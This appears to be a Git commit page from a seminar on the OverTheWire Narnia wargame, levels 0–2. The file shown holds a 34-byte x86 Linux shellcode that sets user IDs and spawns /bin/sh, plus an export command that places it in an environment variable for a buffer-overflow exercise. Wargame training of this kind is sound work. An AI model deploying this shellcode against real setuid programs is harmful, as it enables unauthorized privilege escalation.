Семинар по OTW Narnia0-2

This commit is contained in:
nihonium 2024-04-16 15:06:15 +03:00
parent aa4b1180f5
commit 6961631ab8
Signed by: nihonium
GPG key ID: 0251623741027CFC
11 changed files with 176 additions and 0 deletions

View file

@ -0,0 +1,5 @@
\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80
len: 34
export SHELLCODE=$(python3 -c 'import sys;sys.stdout.buffer.write(b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")')